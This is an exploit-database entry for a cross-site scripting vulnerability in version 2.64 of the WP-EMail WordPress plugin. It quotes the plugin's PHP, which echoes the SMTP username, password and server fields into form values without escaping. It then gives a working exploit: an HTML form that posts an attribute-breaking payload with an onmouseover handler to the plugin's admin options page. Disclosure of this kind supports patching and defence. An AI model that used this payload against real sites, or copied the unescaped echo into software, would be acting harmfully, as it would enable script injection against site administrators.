Wordpress WP-EMail 2.64 Cross Site Scripting Vulnerability



EKU-ID: 4492 CVE: OSVDB-ID:
Author: Ashiyane Published: 2015-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


######################
# Exploit Title : Wordpress WP-EMail 2.64 Cross Site Scripting
  
# Exploit Author : Ashiyane Digital Security Team
  
# Vendor Homepage : https://wordpress.org/plugins/wp-email/
  
# Date : 2015-01-03
  
# Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip
  
# Tested on : Windows 7 / Mozilla Firefox
######################
  
# Location : http://localhost/wordpress/wp-admin/admin.php?page=wp-email/email-options.php
  
######################
# Vulnerable code :
<table class="form-table">
<tr>
<th width="20%"><?php _e('SMTP Username:', 'wp-email'); ?></th>
<td><input type="text" name="email_smtp_name" value="<?php echo
stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></td>
</tr>
<tr>
<th width="20%"><?php _e('SMTP Password:', 'wp-email'); ?></th>
<td><input type="password" name="email_smtp_password" value="<?php echo
stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></td>
</tr>
<tr>
<th width="20%"><?php _e('SMTP Server:', 'wp-email'); ?></th>
<td><input type="text" name="email_smtp_server" value="<?php echo
stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><br /><?php
_e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></td>
</tr>
</table>
#####################
  
Exploit Code:
  
<html>
<body>
<form method="post"
action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wp-email/email-options.php">
<input type="hidden" name="email_smtp_name" value='"
style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;"
onmouseover=alert(1); a="'/>
<input type="submit" name="Submit" class="button" value="Save Changes" />
</form>
</body>
</html>